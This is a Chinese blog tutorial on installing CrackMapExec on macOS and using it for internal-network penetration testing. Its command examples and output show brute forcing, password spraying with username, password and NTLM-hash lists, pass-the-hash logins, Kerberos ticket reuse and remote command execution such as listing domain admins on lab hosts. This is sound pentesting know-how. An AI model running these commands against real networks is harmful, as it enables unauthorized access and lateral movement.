crackmapexec工具详解

已于 2024-01-12 13:44:28 修改
阅读量1.7k 收藏 20
点赞数 21
文章标签: cme crackmapexec 内网渗透
于 2024-01-12 10:12:58 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/135545614
版权
本文详细介绍了如何在Mac上安装CrackMapExec,推荐使用python3.11的pipx安装,并处理了警告信息,包括缺少rust的安装以及处理NotOpenSSLWarning。文章还涵盖了基本使用教程,如选择协议、目标格式、使用凭证和Kerberos身份验证等内容。
摘要由CSDN通过智能技术生成

下载地址:https://github.com/Porchetta-Industries/CrackMapExec
wiki:https://www.crackmapexec.wiki/

1.安装(MAC)

1.1.python3.9 pipx 安装(运行软件有警告,推荐 python3.11 pipx 安装)

1、安装过程。(最好挂着梯子装)
https://www.crackmapexec.wiki/getting-started/installation/installation-on-unix

#~ python3 -m pip install pipx
#~ git clone https://github.com/mpgn/CrackMapExec
#~ cd CrackMapExec
#~ pipx install .

2、报警告信息。
image.png
提示没有 rust,先装个 rust 试试。

brew install rust

image.png
3、重新安装,成功。
image.png

1.2.python3.11 pipx 安装

1、告警信息。

/Users/xx/.local/pipx/venvs/crackmapexec/lib/python3.9/site-packages/urllib3/__init__.py:34: NotOpenSSLWarning: urllib3 v2.0 only supports OpenSSL 1.1.1+, currently the 'ssl' module is compiled with 'LibreSSL 2.8.3'. See: https://github.com/urllib3/urllib3/issues/3020

升级版本可解决
image.png
2、卸载 python3.9 pipx安装的 cme。

pipx uninstall crackmapexec

image.png
3、重新使用 python3.11 安装。

python3.11 -m pipx install .

安装成功。
image.png
运行未提示告警。
image.png
python3.11 -m pipx list查看,没问题。
image.png

2.使用教程

2.1.入门

2.1.1选择和使用协议

使用协议
使用特定协议运行

cme <protocol> <protocol options>

查看可用协议
运行cme --help将列出可用的常规选项和协议(请注意下面的“协议”部分):

#~ cme --help
usage: cme [-h] [-v] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
 [--darrell] [--verbose]

image.png

2.1.2.目标格式

每个协议都通过 CIDR 表示法、IP 地址、IP 范围、主机名、包含目标列表的文件或所有后者的组合来支持目标:

crackmapexec <protocol> poudlard.wizard
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt

2.1.3.使用凭证

https://www.crackmapexec.wiki/getting-started/using-credentials

2.1.3.1.使用凭证

每个协议都支持以一种或另一种形式使用凭证。有关通过特定协议使用凭据的详细信息,请参阅相应的 wiki 部分。
1、一般来说,要使用凭据,您可以运行以下命令:

crackmapexec <protocol> <target(s)> -u username -p password

2、当使用包含特殊符号的用户名或密码时,请将它们用单引号引起来,以使 shell 将它们解释为字符串。

crackmapexec <protocol> <target(s)> -u username -p 'October2022'

image.png
3、由于Python 参数解析库中的错误,以破折号 ( - ) 开头的凭据将引发错误消息。要解决此问题,请使用“长”参数格式指定凭据(注意符号):-expected at least one argument=

crackmapexec <protocol> <target(s)> -u='-username' -p='-October2022'

报错:
image.png
解决:
image.png

2.1.3.2.多域环境

您可以在多域环境中使用 CME

crackmapexec <protocol> <target(s)> -p FILE -u password

其中FILE是具有这种格式的用户名的文件

DOMAIN1\user
DOMAIN2\user
2.1.3.3.暴力破解和密码喷射

所有协议都支持暴力破解和密码喷射。有关使用特定协议进行暴力破解/密码喷射的详细信息,请参阅相应的 wiki 部分。
通过指定一个文件或多个值,CME 将自动使用指定协议对所有目标进行暴力登录:
例子:

crackmapexec <protocol> <target(s)> -u username1 -p password1 password2
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
2.1.3.4.无需暴力破解的密码喷射(个人理解为为多个账密认证时场景。)

对于 WinRM 和 MSSQL 等协议非常有用。此选项可以避免使用文件时的暴力破解(-u file -p file)

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce

user1 -> pass1
user2 -> pass2

默认情况下,CME 会在发现成功登录后退出。即使找到有效密码后,使用 --continue-on-success 标志也会继续喷射。对于针对大型用户列表喷射单个密码非常有用。

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success

2.1.4.使用 Kerberos

CME 确实支持 Kerberos 身份验证,有两种选择,直接使用密码/哈希或使用票证并使用环境KRB5CCNAME名称指定票证。
使用选项-k or–use-kcache 时,您需要指定与 kerberos 票证中的主机名相同的主机名 (FQDN)

$ sudo cme smb zoro.gold.local -k -u bonclay -p Ocotober2022
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\bonclay

或者,使用–use-kcache,这里可以看到管理员票据可以执行命令,其他票据执行命令失败。

$ export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache 
$ cme smb zoro.gold.local --use-kcache
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\administrator (Pwn3d!)
$ sudo cme smb zoro.gold.local --use-kcache -x whoami
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\administrator (Pwn3d!)
SMB zoro.gold.local 445 ZORO [+] Executed command 
SMB zoro.gold.local 445 ZORO gold\administrator


$ export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache
$ sudo cme smb zoro.gold.local --use-kcache -x whoami
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\bonclay

image.png
LDAP 和选项示例–kdcHost

poetry run crackmapexec ldap poudlard.wizard -k --kdcHost dc01.poudlard.wizard 
SMB poudlard.wizard 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:poudlard.wizard) (signing:True) (SMBv1:False) 
LDAP poudlard.wizard 389 DC01 [+] poudlard.wizard\

3.其他

对于有""的命令需要使用-x='命令’来执行。

cme smb 10.7.100.201 -u 'administrator' -H b30609be06b26c5sdfsd12b142f9ca -x='net group "domain admins" /domain'

image.png

cme smb 192.168.xx -u 'xxx' -H 933fa1d9c956a189f -x='ipconfig'
LQxdp
关注
  • 21
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CrackMapExec:用于测试网络的瑞士军刀
02-05
CrackMapExec 赞助商 官方不和谐频道 快来加入Discord! 致谢 (这些是做艰苦工作的人) 该项目最初的灵感来自: 意外贡献者: 项目 的脚本 来自项目的混淆处理的部分Python端口 该存储库包含以下存储库作为子模块: 文档,教程,示例 有关文档和用法示例,请参见项目的 。 安装 请在查看安装维基页面或 去做 0wn一切
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具.zip
10-10
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具 CrackMapExecWin描述为 Windows 编译的伟大 CrackMapExec 工具特性最新 2.2 版本编译为 x86,因此应该在 x86 和 x64 平台上工作用法下载整个归档文件。提取并运行 cra
CrackMapExec 域渗透工具使用
qq_42077227的博客
04-21 4391
最近接触到了这款CrackMapExec 域渗透工具,目前使用感觉是挺不错了,在阅读了该工具在wiki的使用说明之后把一些平时域中需要常用到的命令学习记录了下来。
CrackMapExec 域渗透工具使用(超级详细)
KKleeeaa的博客
06-25 718
前言最近接触到了这款CrackMapExec 域渗透工具,目前使用感觉是挺不错了,在阅读了该工具在wiki的使用说明之后把一些平时域中需要常用到的命令学习记录了下来。一、CrackMapExec 是什么?CrackMapExec 也简称cme ,是一款内网域渗透的工具,可以对域进行信息收集或者一些常见域漏洞的探测。二、简单使用1、获取帮助信息可以看到支持使用哪些协议通过使用指定的协议可以获取进一步的帮助信息。
内网渗透工具CrackMapExec的使用
勤能补拙、勤能补拙
01-13 931
CrackMapExec 也简称cme ,是一款内网域渗透的工具,可以对域进行信息收集或者一些常见域漏洞的探测。
CrackMapExec
08-23
Python脚本编写的工具,集成了多个网络安全工具,安装方式:python setup.py install,注意,需联网,运行install以后会自动下载依赖库。kali2下亲测可用。
CrackMapExec命令详细使用教程
Jeromeyoung
06-08 2726
CrackMapExec工具详细使用教程
Crackmapexec一键检测网络环境(KALI工具系列四十四)
最新发布
LNN0212的博客
07-15 451
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。CrackMapExecCME)是一个功能强大的开源工具,广泛用于网络渗透测试和红队操作。
Kali Linux的crackmapexec
nlj1860453的博客
04-06 310
CrackMapExecCME) 是一种用于开发后任务的开源渗透测试工具。它是用 Python 开发的,主要是为进攻性安全专业人员设计的。CME 允许您执行各种任务,例如执行命令、转储哈希值和利用 Active Directory 环境中 Windows 计算机上的漏洞。它还支持远程代码执行、服务持久化和跨网络的横向移动。但是,请注意,将CME用于未经授权的活动或未经适当同意是非法和不道德的。
windows内网渗透CrackMapExec
xijieyuan2qi的博客
09-15 2939
cmeCrackMapExec内网渗透利器。记录一下方便以后查看。有一些命令是网上查的
LabVIEW 实用工具详解.zip
04-02
在这个“LabVIEW 实用工具详解.zip”压缩包中,我们可以期待找到一系列关于如何有效利用LabVIEW工具和功能的资源。 1. **图形编程**:LabVIEW的核心是其独特的G语言,这是一种基于图形的编程方式,使得代码更加直观...
CrackMapExtreme:满足您所有的网络渗透需求
05-10
____ ____ ____ ____ _ _ _ _ ____ ___ ____ _ _ ___ ____ ____ _ _ ____ | |__/ |__| | |_/ |\/| |__| |__] |___ \/ | |__/ |___ |\/| |___ |___ | \ | | |___ | \_ | | | | | |___ _/\_ | | \ |___ | | |___ CrackMapExec - eXtreme edition 检查新的(正在进行中的)cmx文档站点! Cra
Java开发工具配置详解
01-14
idea、JDK8、Maven、Tomcat、Git的配置与使用
Labview实用工具详解.part03,labview实用工具详解 pdf,LabView
09-10
Labview实用工具详解源码第三部分,压缩包比较大,分八个上传。
J2ME开发详解工具
07-22
资源名称:J2ME开发详解工具篇J2ME开发详解-工具篇,相当基础的文章,主要是根据目前比较热门的手机,像诺基亚、西门子、摩托罗拉等品牌手机程序的IDE开发工具,主要讲解配置及一些基础知识。 资源太大,传百度网盘...
网络性能测试工具Iperf详解
03-23
缺陷管理详解Iperf是一个网络性能测试工具,也就是LINUX网速测试,主要应用于LINUX服务器下面。可以测试TCP和UDP带宽质量,可以测量最大TCP带宽,具有多种参数和UDP特性,可以报告带宽,延迟抖动和数据包丢失。Iperf...
**探索多平台渗透测试的未来:CrackMapExec – 构建安全防线的最佳伙伴**
gitblog_00005的博客
06-14 240
探索多平台渗透测试的未来:CrackMapExec – 构建安全防线的最佳伙伴 项目地址:https://gitcode.com/mabangde/pentesttools 项目介绍 在网络安全领域中,CrackMapExec是一款备受推崇的安全评估工具,它以其高效性和灵活性著称。最初仅适用于Linux环境,开发者社区不断推动其边界,使得这款工具现在也能在Windows平台上运行自如。通过编译后的...
visionpro工具详解pdf
11-01
VisionPro工具详解PDF是一个关于VisionPro工具的详细说明文档。VisionPro是一款强大的机器视觉软件,用于图像处理和分析。这个工具详解PDF提供了有关VisionPro工具的全面信息和指导,可以帮助用户充分了解和使用这个软件。 这个PDF文件包含了VisionPro工具的各个方面的详细描述。首先,它介绍了VisionPro软件的基本概念和功能,以及如何安装和配置软件。其次,它详细说明了VisionPro工具箱的各个组件和模块的功能和用法。 这个工具详解PDF还提供了丰富的图示和示例,以帮助用户更好地理解和应用VisionPro工具。它演示了如何使用VisionPro来解决各种机器视觉应用中的问题,例如物体定位、检测和测量等。 此外,这个PDF文档还包含了一些实用技巧和最佳实践,以帮助用户更有效地使用VisionPro工具。它提供了一些建议和建议,以避免常见的错误和问题。 总的来说,VisionPro工具详解PDF是一份非常有价值的文档,对于那些想要学习和应用VisionPro工具的人来说,它是一个非常有用的参考资料。通过阅读这个工具详解PDF,用户可以掌握VisionPro工具的使用方法,提高图像处理和分析的技能,从而更好地应用机器视觉技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值